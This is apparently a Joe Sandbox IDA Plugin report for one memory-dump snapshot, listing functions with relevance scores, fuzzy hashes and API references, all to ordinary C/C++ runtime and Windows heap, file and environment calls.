Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 2b641388cc27c8dfc1632a55c6703e69612a744c671257e181bd58f5db8d7186
Instruction ID: e97dd9779feb096d62c8b8ebb7fd62c5afb5c7a9843fc17eda4ca591081f6e7d
Opcode Fuzzy Hash: 2b641388cc27c8dfc1632a55c6703e69612a744c671257e181bd58f5db8d7186
Instruction Fuzzy Hash: 9E211675D00109EFCB18EFA4C881AEEBBB4AF44300F108169E412672D5EB386E45FF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F0BB28 Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___scrt_release_startup_lock.LIBCMT ref: 00F0BB78
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00F0BB8C
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00F0BBB2
___scrt_uninitialize_crt.LIBCMT ref: 00F0BBFB

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
String ID:
API String ID: 3089971210-0
Opcode ID: 1d24639c665e0e40d3e0fa75cb9d5592c2f8efa276e4efcfb9eb83e5b963fc5e
Instruction ID: 68e01f0165a28e8a4046b4a8298e2d8063bb2f54220bc0452939b8194b6e2ba5
Opcode Fuzzy Hash: 1d24639c665e0e40d3e0fa75cb9d5592c2f8efa276e4efcfb9eb83e5b963fc5e
Instruction Fuzzy Hash: 67212272908711ABCB257B34AC07B9D73A19FC2BB4F244029F4412B2D2DF6A4881BA80

Uniqueness

Uniqueness Score: -1.00%

Function 00F04900 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

task.LIBCPMTD ref: 00F04C8B
task.LIBCPMTD ref: 00F04C93

Strings

@, xrefs: 00F04AFD

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: task
String ID: @
API String ID: 1384045349-2766056989
Opcode ID: a7070e7ab51ec456cba57dfaee1664847c0e2c7d05c1f1dc1cc9802cb57ca8fb
Instruction ID: c5f9bc7fa750dddeff5c5aeefdf18a6164537d74fd85100dce1d37437c5004b7
Opcode Fuzzy Hash: a7070e7ab51ec456cba57dfaee1664847c0e2c7d05c1f1dc1cc9802cb57ca8fb
Instruction Fuzzy Hash: 34D14DB1E001489FCB08DF98DD91AEEBBB5BF48300F148159F919A7295DB38AD51EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F09C52 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Allocate.LIBCONCRTD ref: 00F09C88
_Deallocate.LIBCONCRTD ref: 00F09CC0

Strings

R!, xrefs: 00F09D8F

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: AllocateDeallocate
String ID: R!
API String ID: 3662798237-550877972
Opcode ID: 2bcd7fc5ffab568a84961cdc3d9d8b5b885a7045f321703cff9e548258e09f69
Instruction ID: fb9cea3f8e40caf235d98d29605faa45d3537e893e69a18b3a641f6a02bdce28
Opcode Fuzzy Hash: 2bcd7fc5ffab568a84961cdc3d9d8b5b885a7045f321703cff9e548258e09f69
Instruction Fuzzy Hash: 5A110671905249AFCB01DFA88C8099FBBB9AF45300F1481A9F8549B383D635D902E7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00F131C9 Relevance: 4.6, APIs: 3, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F18AC7: GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
Part of subcall function 00F18AC7: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

_free.LIBCMT ref: 00F1325D
_free.LIBCMT ref: 00F1328B
_free.LIBCMT ref: 00F132CE

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: a44df33793eeb6dbe670adec908d33896e0e622a84284d13405350b3a4a9ab3a
Instruction ID: 7077d8376dae174a7ea35805dc1db16238ed964c2bfeb04c104ff1c6bcbe4cb0
Opcode Fuzzy Hash: a44df33793eeb6dbe670adec908d33896e0e622a84284d13405350b3a4a9ab3a
Instruction Fuzzy Hash: DC416E31A04205AFDB24EFACCC81AA9B7F5FF48324B24456DE415D7291DB31ED94EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F1FF88 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,?,00F14D23,00000000,00000000,00F14CF5,00F14F89,00F0BBC9,011A7220,00000014), ref: 00F1FF91
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,00F14D23,00000000,00000000,00F14CF5,00F14F89,00F0BBC9,011A7220,00000014), ref: 00F1FFFF

Part of subcall function 00F1EB3B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00F1D228,?,00000000,00000000), ref: 00F1EBE7

Part of subcall function 00F1845A: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F1D6D2,?,00000000,?,00F22956,?,00000004,00000000,?,?,?,00F16BBE), ref: 00F1848C

_free.LIBCMT ref: 00F1FFF0

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 1c0d4b8cf07861462d842f953109b353c3c8661cd9eb3e1abde320740d7eb8ab
Instruction ID: cf632475ae4b8c0fbef0948ff2bce3d5dd370f4419ee9ff7a3b1e09481fe6ab7
Opcode Fuzzy Hash: 1c0d4b8cf07861462d842f953109b353c3c8661cd9eb3e1abde320740d7eb8ab
Instruction Fuzzy Hash: 0201D4A3A052257B6721A2BA1CC9CFF696DCAC7BB13150238F915C2145EE94CC87B2B0

Uniqueness

Uniqueness Score: -1.00%

Function 00F1333E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00F13391

Strings

,M, xrefs: 00F133B0

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free
String ID: ,M
API String ID: 269201875-3580740127
Opcode ID: 56b0ae6d313d0340c98d7a59b5bfd677cfd7b3f0ecab801d3d22e2f2c0fafce8
Instruction ID: 298f94f1978fcb00aab57d4bef50ad2780e411c41e699b5000025da404b14ac9
Opcode Fuzzy Hash: 56b0ae6d313d0340c98d7a59b5bfd677cfd7b3f0ecab801d3d22e2f2c0fafce8
Instruction Fuzzy Hash: FE11E776C04208BACF14EB989C4A9DE77B89F44730F244163F915E2191EE30CBC4A795

Uniqueness

Uniqueness Score: -1.00%

Function 00F1AAD9 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F1AB75
GetLastError.KERNEL32 ref: 00F1AB9B

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: e03ef8589f3aaa6c535c44e40826a759ae05c3d4b7bb6ffd6464a500c65b5235
Instruction ID: bbee698fd7986b2f29c8a885b546170e9b805f306d42a22636b2a62a88d9ace3
Opcode Fuzzy Hash: e03ef8589f3aaa6c535c44e40826a759ae05c3d4b7bb6ffd6464a500c65b5235
Instruction Fuzzy Hash: 0821B475A052589FCF19CF29DC80AEDB7BAEF88301F2040A9E906D7211D630DD82DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F1831A Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00F18366
GetFileType.KERNELBASE(00000000), ref: 00F18378

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 9206d791383a1bebb3ec13aa682bb711f840eab47e4a28ee9c1112990ba66069
Instruction ID: 386d735ab3136c6264faeae40611e120489593128e696a208db0cda517d83ef5
Opcode Fuzzy Hash: 9206d791383a1bebb3ec13aa682bb711f840eab47e4a28ee9c1112990ba66069
Instruction Fuzzy Hash: D511DA329047514AC734493E8E986A6BA95AB577B4F3C071AD1B6C71E1CB30D9C7F241

Uniqueness

Uniqueness Score: -1.00%

Function 00F05EE5 Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 00F05EED

Part of subcall function 00F01C10: std::bad_alloc::bad_alloc.LIBCMTD ref: 00F01C19

std::_Facet_Register.LIBCPMT ref: 00F05F0A

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFacet_Registerstd::_std::bad_alloc::bad_alloc
String ID:
API String ID: 2283409181-0
Opcode ID: b9af37f69f79ac29d5f4049e2f4efc206497b1981fc35c871388b9e6bde51a05
Instruction ID: fa2bab5ce21ac499085b96a51a26f0766ff155bfcacea5cf53f72e62f5aecbe8
Opcode Fuzzy Hash: b9af37f69f79ac29d5f4049e2f4efc206497b1981fc35c871388b9e6bde51a05
Instruction Fuzzy Hash: 1901DA75D101099BCB14EF94C8918EEB7B1BF44310F108299E425673D1EB34AE41EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F14D0B Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00F14D53

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1eb6d7f15aa11f9993852e150c3078efc9d98dcf8afcfe4c0063f784d3bd7ec4
Instruction ID: 6989293b66ccd244d3ae83a22f99f41e23ac132af5c7c62da9a790cf3a21c905
Opcode Fuzzy Hash: 1eb6d7f15aa11f9993852e150c3078efc9d98dcf8afcfe4c0063f784d3bd7ec4
Instruction Fuzzy Hash: F2E0652290562145EA25773A7C117EA7AA5AFC2332F514336F8348B1D0DF6498C7B691

Uniqueness

Uniqueness Score: -1.00%

Function 00F0A504 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

std::ios_base::_Init.LIBCPMT ref: 00F0A50C

Part of subcall function 00F0A324: __EH_prolog3.LIBCMT ref: 00F0A32B
Part of subcall function 00F0A324: std::ios_base::clear.LIBCPMTD ref: 00F0A35C
Part of subcall function 00F0A324: std::locale::_Init.LIBCPMT ref: 00F0A374

std::ios_base::clear.LIBCPMTD ref: 00F0A538

Part of subcall function 00F02570: std::make_error_code.LIBCPMTD ref: 00F025D9
Part of subcall function 00F02570: std::ios_base::failure::failure.LIBCPMTD ref: 00F025E9

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: Initstd::ios_base::clear$H_prolog3std::ios_base::_std::ios_base::failure::failurestd::locale::_std::make_error_code
String ID:
API String ID: 4014130437-0
Opcode ID: 08ba1ea248bcf9e2d314ffd841125107648e596eec1f03445c6fcd75c148346b
Instruction ID: 7c14eb3571d9c3c8c57e1a77228aa6ea0bb4d2b9eea5d622ed61d3a434932e8b
Opcode Fuzzy Hash: 08ba1ea248bcf9e2d314ffd841125107648e596eec1f03445c6fcd75c148346b
Instruction Fuzzy Hash: 18F0E5319007506BEB30A6359C49B6B7BE8AB00330F44480EF48247AC2CAB9F440EB95

Uniqueness

Uniqueness Score: -1.00%

Function 00F0A54F Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de1c3ed298045ed860557f1133426c6df744e32d7fc9e3ecccbcb8c21e85e27c
Instruction ID: 7fb727d27cf7f21b9c8097aa86639cacedd2505bd7e31190886305eb5f2cb1ee
Opcode Fuzzy Hash: de1c3ed298045ed860557f1133426c6df744e32d7fc9e3ecccbcb8c21e85e27c
Instruction Fuzzy Hash: 2931AB3291020AAFCF15CF68D9809EDB7B9BF09324B184269E502A72C0D731FD54FB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F16C5E Relevance: 1.6, APIs: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F16D11

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4d440868a624f2c7777c7d510235d2d2bc15553f2c243ddaa414709ce7798739
Instruction ID: 2ecfc9027e2be7625a06228ab81f51d5891606c8cebd17a633fecd8a2dca28b3
Opcode Fuzzy Hash: 4d440868a624f2c7777c7d510235d2d2bc15553f2c243ddaa414709ce7798739
Instruction Fuzzy Hash: 09317AB6E006149F8B14DF6DD4C089EB7F2FF8932072586A5D525EB360D730AC81EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F17C76 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e9a60075b60955e5d2f5e7fcfc73e1953ad05d0f6fa5cb6def326b15e608ca
Instruction ID: 548c4d096eea4856ea0d907f0260f239686cfc67ad6ea35beca59cdbb190c9ac
Opcode Fuzzy Hash: 70e9a60075b60955e5d2f5e7fcfc73e1953ad05d0f6fa5cb6def326b15e608ca
Instruction Fuzzy Hash: 9801B5337083155FDB29AD6DED40A9A37AAABC43707244120FA19CB188EA30D8C1E7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00F203A5 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00F17942: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F18C69,00000001,00000364,00000005,000000FF,?,00F22956,?,00000004,00000000,?,?), ref: 00F17983

_free.LIBCMT ref: 00F20414

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 66d03e905b4d41e2a1f43aab95367bb98a4cfb971e1f175d3de636b540564859
Instruction ID: e68f510d03fd9630197d4789d9c23012c870bd2806fab6785cb02aea73066182
Opcode Fuzzy Hash: 66d03e905b4d41e2a1f43aab95367bb98a4cfb971e1f175d3de636b540564859
Instruction Fuzzy Hash: 33014973A043266BC320DF68D8819DEFBA8FB053B0F544629E545B76C1D7706D10C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F037E0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_swprintf.LIBCMTD ref: 00F03820

Part of subcall function 00F01230: __vswprintf_s_l.LIBCONCRTD ref: 00F0124E

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: __vswprintf_s_l_swprintf
String ID:
API String ID: 1343831024-0
Opcode ID: 35919c5f594cd5c9b3bfcd534d41e57f0f604e5baf04691e9d8fc640189cfc45
Instruction ID: 0bc9452ec782dffa767d53e8c93f023028caa5ed0c42be17fad0fd28f1a7f0e3
Opcode Fuzzy Hash: 35919c5f594cd5c9b3bfcd534d41e57f0f604e5baf04691e9d8fc640189cfc45
Instruction Fuzzy Hash: E201E1B6A1010CABCB04DFD9DC51DAF77BDAF5C700F40815CBA1997285DA34E9109BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F15495 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00F17942: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F18C69,00000001,00000364,00000005,000000FF,?,00F22956,?,00000004,00000000,?,?), ref: 00F17983

_free.LIBCMT ref: 00F154B5

Part of subcall function 00F1799F: HeapFree.KERNEL32(00000000,00000000,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?), ref: 00F179B5
Part of subcall function 00F1799F: GetLastError.KERNEL32(?,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?,?), ref: 00F179C7

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: bcce13e9c669b77a3349c8693d8280bf47878e71349350ca4ac59acb157ce99a
Instruction ID: 69d74d48334f46d406d4b6dcc2af59f69f05ec95a1ae017745300b469aedfc8c
Opcode Fuzzy Hash: bcce13e9c669b77a3349c8693d8280bf47878e71349350ca4ac59acb157ce99a
Instruction Fuzzy Hash: 8F0108B6D00619AFCB10DFA9C881ADEBBB8FB48710F104166E914E7240E774AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F17942 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F18C69,00000001,00000364,00000005,000000FF,?,00F22956,?,00000004,00000000,?,?), ref: 00F17983

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7d7be55f4ec4b237edf4517d0a4819b06dc8d1aef6ad13d711285189dbd541ec
Instruction ID: 7e51eed8d55ce43ddf697f4927f0ef56bf59fb7bfe6971c566d05e29857decce
Opcode Fuzzy Hash: 7d7be55f4ec4b237edf4517d0a4819b06dc8d1aef6ad13d711285189dbd541ec
Instruction Fuzzy Hash: FAF0B432A08328679B217A669C05BEAB7699F41770F598121E91CAA184CB24D984BAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F059A0 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00F059DB

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

